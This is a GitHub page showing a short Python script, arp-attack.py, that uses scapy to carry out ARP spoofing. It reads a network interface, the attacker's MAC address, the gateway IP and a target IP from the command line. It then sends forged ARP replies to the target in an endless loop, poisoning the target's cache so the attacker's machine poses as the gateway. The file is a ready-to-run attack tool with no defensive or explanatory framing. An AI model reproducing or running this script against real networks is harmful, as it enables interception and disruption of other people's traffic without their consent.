-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy patharp-attack.py
39 lines (33 loc) · 987 Bytes
/
arp-attack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
"""
========================================
Name:Sharp edge Author: Lalevin Martin
Mailbox: [email protected]
Github: http://github.com/nacglalevin
Written in 2022-11-2
==================NACG==================
"""
from scapy.all import *
from optparse import OptionParser
import sys
import time
usage = 'Usage: [interface] [localhost_mac] [gateway] [target_ip]'
try:
interface = sys.argv[1]
ip_mac_local = sys.argv[2]
ip_gateway = sys.argv[3]
ip = sys.argv[4]
except:
print(usage)
sys.exit(0)
ip_mac = getmacbyip(ip)
print("[*] target_mac: %s" % ip_mac)
print("[*] localhost_mac: %s" % ip_mac_local)
packet = Ether(src=ip_mac_local, dst=ip_mac)/ARP(psrc=ip_gateway, hwsrc=ip_mac_local,pdst=ip, hwdst=ip_mac, op=2)
print("[*] ARP attacking... ")
try:
while True:
sendp(packet, inter=2, iface=interface)
time.sleep(2)
except KeyboardInterrupt:
print ("[*] Stop...")
sys.exit(0)